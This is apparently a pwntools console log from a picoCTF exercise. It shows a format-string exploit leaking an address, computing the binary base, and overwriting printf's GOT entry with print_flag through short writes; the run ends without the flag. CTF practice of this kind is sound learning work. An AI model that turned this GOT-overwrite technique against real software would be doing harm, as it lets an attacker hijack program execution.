[x] Opening connection to shape-facility.picoctf.net on port 64633
[x] Opening connection to shape-facility.picoctf.net on port 64633: Trying 3.20.150.139
[+] Opening connection to shape-facility.picoctf.net on port 64633: Done
[*] Leak: b'0x564d2b4ec413'
[*] Base: 0x564d2b4eb000
[*] print_flag: 0x564d2b4ec269
[*] GOT printf: 0x564d2b4eefa0
[*] Shorts to write: 0xc269, 0x2b4e, 0x564d
[*] Write order: [('0x2b4e', 7), ('0x564d', 8), ('0xc269', 6)]
[*] Payload size: 60 bytes
[*] Sending 'exit' to trigger printf...
[*] Waiting for flag...
[x] Receiving all data
[x] Receiving all data: 6B
[x] Receiving all data: 28B
[+] Receiving all data: Done (28B)
[*] Closed connection to shape-facility.picoctf.net port 64633

[*] Full Response:
N+MVThe Valley Disappears

[!] No flag found in response
